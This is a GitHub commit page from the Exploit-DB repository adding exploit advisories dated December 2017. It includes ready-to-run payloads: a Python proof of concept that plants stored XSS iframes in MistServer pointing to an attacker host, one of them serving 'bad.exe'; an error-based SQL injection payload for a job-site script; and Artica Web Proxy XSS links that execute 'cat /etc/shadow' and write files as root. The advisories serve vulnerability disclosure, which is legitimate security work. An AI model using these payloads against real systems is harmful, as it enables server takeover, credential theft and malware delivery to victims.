Skip to content

Commit

Permalink
DB: 2017-12-02
Browse files Browse the repository at this point in the history 
8 changes to exploits/shellcodes

6 new exploits/shellcodes

Abyss Web Server < 2.11.6 - Heap Memory Corruption

HP iMC Plat 7.2 - Remote Code Execution

HP iMC Plat 7.2 - Remote Code Execution (2)

Kodi 15 - Web Interface Arbitrary File Access (
Kodi 15 - Web Interface Arbitrary File Access
Jobs2Careers / Coroflot Clone - SQL Injection
MistServer 2.12 - Cross-Site Scripting
Artica Web Proxy 3.06 - Remote Code Execution
  • Loading branch information
Offensive Security committed Dec 2, 2017
1 parent a24ecf7 commit bb8b231
Show file tree
Hide file tree
Showing 9 changed files with 596 additions and 4 deletions.
3 changes: 2 additions & 1 deletion exploits/linux/dos/43199.c
View file
Original file line number Diff line number Diff line change
@@ -1,6 +1,7 @@
// EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0
// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC
// Author Note: Before running, make sure to set transparent huge pages to "always": `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`
// Author Note: Before running, make sure to set transparent huge pages to "always":
// `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`
//

//
Expand Down
3 changes: 1 addition & 2 deletions exploits/linux/webapps/38833.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,8 +3,7 @@
# Date: 25-11-2015
# Contact: https://twitter.com/mpronk89
# Software Link: http://kodi.tv/
# Original report:
http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Version: v15
# Tested on: linux
# CVE : n/a
Expand Down
94 changes: 94 additions & 0 deletions exploits/multiple/webapps/43205.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,94 @@
[+] Credits: John Page (aka Hyp3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MIST-SERVER-v2.12-UNAUTHENTICATED-PERSISTENT-XSS-CVE-2017-16884.txt
[+] ISR: ApparitionSec



Vendor:
=============
mistserver.org



Product:
===========
MistServer v2.12


MistServer is a full-featured, next-generation streaming media toolkit for OTT (internet streaming).



Vulnerability Type:
===================
Unauthenticated Persistent XSS



CVE Reference:
==============
CVE-2017-16884



Security Issue:
================
Unauthenticated remote attackers can inject persistent XSS payloads by making failed HTTP authentication requests. Attacker supplied payloads will
get stored in the server logs as failed authentication requests alerts. Mistserver echoes back the unsanitized payloads in Mist Servers Web interface
automatically due to automatic refresh of the UI every few seconds, thereby, executing arbitrary attacker supplied code.



References:
============
https://news.mistserver.org/news/78/Stable+release+2.13+now+available%21



Exploit/POC:
=============
import requests

#INJECT IFRAME
requests.get('http://VICTIM-IP:4242/admin/api?callback=&command={"authorize":{"password":"666","username":"<iframe src=\'http://ATTACKER-IP\'></iframe>"}}')

#PUSH MALWARE
requests.get('http://VICTIM-IP:4242/admin/api?callback=&command={"authorize":{"password":"666","username":"<iframe src=\'http://ATTACKER-IP/bad.exe\'></iframe>"}}')

#EXFIL LOGS
requests.get('http://VICTIM-IP:4242/admin/api?command={"authorize":{"password":"666","username":"<script>alert(document.body.innerHTML)</script>"}}')



Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
=============================
Vendor Notification: October 19, 2017
Vendor Acknowledgement : October 20, 2017
Vendor Released Fix : November 30, 2017
December 1, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
37 changes: 37 additions & 0 deletions exploits/php/webapps/43203.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,37 @@
# Exploit Title: Jobs2Careers / Coroflot Clone - SQL Injection
# Date: 2017-11-30
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.i-netsolution.com/
# Software Link: http://www.i-netsolution.com/product/jobs2careers-coroflot-jobs-clone-script/
# Version: 30 November 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.13.1]
# Email: [email protected]
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-11-30

Product & Service Introduction:
===============================
Our readymade PHP job site script make your own job portal website set in motion.

Technical Details & Description:
================================

SQL injection on [keyword] parameter.

Proof of Concept (PoC):
=======================

SQLi:

https://localhost/[path]/onlinejobsearch/job

Parameter: keyword (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: keyword=xxxx') AND (SELECT 6727 FROM(SELECT COUNT(*),CONCAT(0x7176707a71,(SELECT (ELT(6727=6727,1))),0x7178627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zImA'='zImA&location_name[]=

==================
8bitsec - [https://twitter.com/_8bitsec]
90 changes: 90 additions & 0 deletions exploits/php/webapps/43206.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,90 @@
[+] Credits: John Page (aka Hyp3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt
[+] ISR: ApparitionSec



Vendor:
=======
www.articatech.com



Product:
=========
Artica Web Proxy v.3.06.112216


Artica Tech offers a powerful but easy-to-use Enterprise-Class Web Security and Control solution,
usually the preserve of large companies. ARTICA PROXY Solutions have been developed over the past
10 years as an Open Source Project to help SMEs and public bodies protect both their organizations
and employees from risks posed by the Internet.



Vulnerability Type:
===================
Remote Code Execution



CVE Reference:
==============
CVE-2017-17055



Security Issue:
================
Artica offers a web based command line emulator 'system.terminal.php' (shell), allowing authenticated users to execute OS commands as root.
However, artica fails to sanitize the following HTTP request parameter $_GET["username-form-id"] used in 'freeradius.users.php'.

Therefore, authenticated users who click an attacker supplied link or visit a malicious webpage, can result in execution of attacker
supplied Javascript code. Which is then used to execute unauthorized Operating System Commands (RCE) on the affected Artica Web Proxy Server
abusing the system.terminal.php functionality. Result is attacker takeover of the artica server.



Exploit/POC:
=============
1) Steal artica Server "/etc/shadow" password file.

https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E

2) Write file 'PWN' to /tmp dir.

https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E


Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
=============================
Vendor Notification: November 28, 2017
Vendor Confirms Vulnerability : November 28, 2017
Vendor Reply "Fixed in 3.06.112911 / ISO released" : November 29, 2017
December 1, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
Loading

0 comments on commit bb8b231

Please sign in to comment.